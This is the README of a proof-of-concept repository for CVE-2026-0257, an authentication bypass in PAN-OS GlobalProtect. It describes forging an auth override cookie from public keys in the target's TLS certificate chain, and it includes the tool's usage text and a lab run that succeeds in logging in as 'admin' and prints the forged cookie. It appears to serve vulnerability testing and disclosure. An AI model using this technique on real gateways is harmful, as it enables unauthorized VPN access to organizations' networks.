sfewer-r7/CVE-2026-0257: forge a GlobalProtect auth override cookie using the public key from TLS

A proof-of-concept script to test a target PAN-OS GlobalProtect portal or gateway for CVE-2026-0257. The script will attempt to forge a valid authentication override cookie by iterating over the certificate chain used by the HTTPS service, and for every public key in the chain, forge a new authentication override cookie, testing it against the GlobaProtect target to see if it is valid.

A successfully forged cookie will login to the GlobaProtect target and retrieve VPN connection information (Use the --verbose argument to inspect).

Usage

$ python forge_cookie.py --help
usage: forge_cookie.py [-h] --target TARGET [--port PORT] [--user USER] [--domain DOMAIN] [--host-id HOST_ID]
                       [--client-os CLIENT_OS] [--client-ip CLIENT_IP] [--context {gateway,portal,both}] [--verbose]

Forge a GlobalProtect auth override cookie using the public key from TLS (CVE-2026-0257).

options:
  -h, --help            show this help message and exit
  --target TARGET       Target GlobalProtect portal or gateway (IP or hostname)
  --port PORT           Target port (default: 443)
  --user USER           Username to forge cookie for (default: admin)
  --domain DOMAIN       Domain for cookie (default: empty)
  --host-id HOST_ID     Host ID for cookie (default: empty)
  --client-os CLIENT_OS
                        Client OS for cookie (default: Windows)
  --client-ip CLIENT_IP
                        Client IP in cookie (default: 0.0.0.0)
  --context {gateway,portal,both}
                        Context to test: gateway, portal, or both (default target)
  --verbose             Print full response

Example

$ python forge_cookie.py --target 192.168.86.99
[*] Retrieving certificate chain from 192.168.86.99:443 ...
  Found 2 certificate(s) in chain:
  [0] CN=192.168.86.99 (RSA 2048 bits, CA=False)
  [1] CN=GP-Lab-CA (RSA 2048 bits, CA=True)

[*] Forging cookie for user 'admin', testing each key

  Trying [0] CN=192.168.86.99
  [-] Failure - Gateway did not accepted the forged cookie
  [-] Failure - Portal did not accepted the forged cookie

  Trying [1] CN=GP-Lab-CA
  [+] Success - Gateway accepted the forged cookie
  Cookie: bvUbfM5n5rWnZp8tp3AIE8Q/v9L7rJSgRb1suYHHBedwBrfUr4pItrluBYtQ3VtmkF0AYXw9hyipzrMC5qg0JO+ZHuZpHLIFNfhergPGRbLFBkRk9sriFMuGiRU1q3bBSF7PzxDn+0dy0+fG4Wf7u+JD4qQEcw+tIgp9UKv0IhyFY9XxwzYdrQucA8P9zKRkGiEQpFwD776mONJKnHZTe+R+D/wy49ATBWETuhD2NP+7dB2IeSfV2eGBiZWTJcLAxXpQHcKRImhTGKlw9o4Frw+RBVqh9aCXCQ4yLYuAviabWpV94Fhp/3aPVTrLDCOrbBilsu6Men9oOT3+b8Uw2g==